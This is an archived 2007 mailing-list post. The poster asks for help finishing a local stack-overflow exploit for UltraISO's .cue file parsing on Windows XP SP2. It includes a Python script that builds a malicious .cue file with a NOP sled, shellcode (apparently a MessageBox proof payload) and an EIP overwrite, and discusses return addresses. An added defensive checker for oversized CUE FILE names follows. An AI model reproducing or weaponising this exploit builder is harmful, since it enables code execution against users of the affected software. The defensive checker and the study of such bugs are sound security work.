Vulnerability Development mailing list archives
Help developing exploit
From: KaCo678 () aol com
Date: 26 May 2007 17:32:12 -0000
Hi, I was wondering if you would be able to help. I recently found a stack overflow in UltraISO and was trying to write a local exploit for it. I'm able to find the address where my NOP sled is, and everything I've tried hasn't worked. And well, as you seem to be a well-respected member of the community, you might be able to help me. I've asked a few people for help with this one, but I'm still no further forward. I'll explain the best I can. I'm able to control the ECX register and EIP. I attach OllyDbg and open the .cue file, and the program crashes; my EIP points to 90909090 (NOP sled, lol). Then I press Shift+F9, and then I can write anything I want to the EIP, so for testing I wrote 41424344, which then wrote to the EIP and ECX register. At 3299 bytes, then the 4 bytes to write to the registers. I've provided a little test script. It's a mess, but it's just for testing, mate. Also worth noting that we still have to actually fill the rest of the file, so altogether we have 5004 bytes to the file. I hope I'm making sense. I was going to use the bouncing shared libraries method, but not sure; I changed the EIP to the address 0x7C80C75B (jmp ebp) as my NOPs were in there somewhere. I've written a Python script I'm using to test it. Also, if you do take a look, you will need to create a fake .bin file in the same directory. Any help would be great, thanks for your time.
#!/usr/bin/python
###
# Python 2 script: string literals are byte strings here.
import sys
import struct
import time

head_file = "\x46\x49\x4c\x45\x20\x22"   # Header of file: FILE "
buffer1 = "\x90" * 4000                   # 4000 nops
nop = "\x90" * 189                        # 189 nops
shell = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\xeb\x37\x59\x88\x51\x0a\xbb"  # 110 bytes shell code
shell += "\x77\x1d\x80\x7c"
shell += "\x51\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x0b\x51\x50\xbb"
shell += "\x28\xac\x80\x7c"
shell += "\xff\xd3\xeb\x39\x59\x31\xd2\x88\x51\x06\x31\xd2\x52\x51"
shell += "\x51\x52\xff\xd0\x31\xd2\x50\xb8\xa2\xca\x81\x7c\xff\xd0\xe8\xc4\xff"
shell += "\xff\xff\x75\x73\x65\x72\x33\x32\x2e\x64\x6c\x6c\x4e\xe8\xc2\xff\xff"
shell += "\xff\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x41\x4e\xe8\xc2\xff\xff"
shell += "\xff\x4f\x6d\x65\x67\x61\x37\x4e"
fuck = "\x90" * 2                         # lost 2 bytes some where made it up lol
offset = "\x41\x42\x43\x44"
buffer2 = "\x45" * 701                    # fill the rest of the file with junk
Head_end = "\x2e\x42\x49\x4e\x22\x20\x42\x49\x4e\x41\x52\x59\x0d\x0a\x20"  # end of file: .BIN" BINARY / TRACK 01 MODE1/2352 / INDEX 01 00:00:00
Head_end += "\x54\x52\x41\x43\x4b\x20\x30\x31\x20\x4d\x4f\x44\x45\x31\x2f\x32"
Head_end += "\x33\x35\x32\x0d\x0a\x20\x20\x20\x49\x4e\x44\x45\x58\x20\x30\x31"
Head_end += "\x20\x30\x30\x3a\x30\x30\x3a\x30\x30"

cue_file = open("1.cue", "wb")
cue_file.write(head_file + buffer1 + nop + shell + fuck + offset + buffer2 + Head_end)
cue_file.close()

I'm very confused at the moment, as a few people have told me a few ways to exploit this, lol. But I'm still learning. I was wondering, could I not just point my EIP to my NOP sled, so my shellcode gets executed? I'm working with Windows XP SP2. Just can't seem to get to the address of my NOP code.
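The crash described above comes from an oversized name inside the CUE sheet's FILE "..." entry. As an added example that is not part of the original post or of UltraISO, the following parser-side check walks a CUE sheet's FILE entries and flags names longer than MAX_PATH (assumed here as the sane upper bound) or containing non-printable bytes; the sample CUE sheets are constructed.

```python
import re

# Windows MAX_PATH; assumed here as the upper bound a legitimate FILE entry needs.
MAX_PATH = 260

# CUE file types a FILE entry may legitimately declare.
KNOWN_TYPES = (b"BINARY", b"MOTOROLA", b"WAVE", b"MP3", b"AIFF")

# A FILE entry: FILE "<name>" <type>. The name group accepts any byte except a
# quote (newlines included) so an over-long or binary-stuffed name is captured
# and measured instead of being silently skipped by a line-based split.
FILE_ENTRY = re.compile(rb'FILE\s+"([^"]*)"\s*(\S*)')


def check_cue(data):
    """Return a list of (offset, reason) findings for a CUE sheet given as bytes."""
    findings = []
    for m in FILE_ENTRY.finditer(data):
        name, kind = m.group(1), m.group(2)
        if len(name) > MAX_PATH:
            findings.append((m.start(), "FILE name is %d bytes, over MAX_PATH" % len(name)))
        if any(c < 0x20 or c > 0x7E for c in name):
            findings.append((m.start(), "FILE name contains non-printable bytes"))
        if kind not in KNOWN_TYPES:
            findings.append((m.start(), "unknown file type %r" % kind))
    if not FILE_ENTRY.search(data):
        findings.append((0, "no FILE entry found"))
    return findings


# Constructed samples (not taken from the original post).
BENIGN_CUE = (b'FILE "disc.bin" BINARY\r\n'
              b'  TRACK 01 MODE1/2352\r\n'
              b'    INDEX 01 00:00:00\r\n')

# Same layout as the post's test file: a name field stuffed with 4000 0x90 bytes.
OVERSIZED_CUE = (b'FILE "' + b"\x90" * 4000 + b'.BIN" BINARY\r\n'
                 b'  TRACK 01 MODE1/2352\r\n'
                 b'    INDEX 01 00:00:00\r\n')

if __name__ == "__main__":
    for label, cue in (("benign", BENIGN_CUE), ("oversized", OVERSIZED_CUE)):
        print(label, check_cue(cue) or "ok")
```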
Current thread:
- Help developing exploit KaCo678 (May 26)
- Re: Help developing exploit Valdis . Kletnieks (May 26)
- Re: Help developing exploit Thomas Pollet (May 28)
- <Possible follow-ups>
- Re: Re: Help developing exploit KaCo678 (May 27)
- Re: Help developing exploit Valdis . Kletnieks (May 27)
- Re: Re: Help developing exploit KaCo678 (May 27)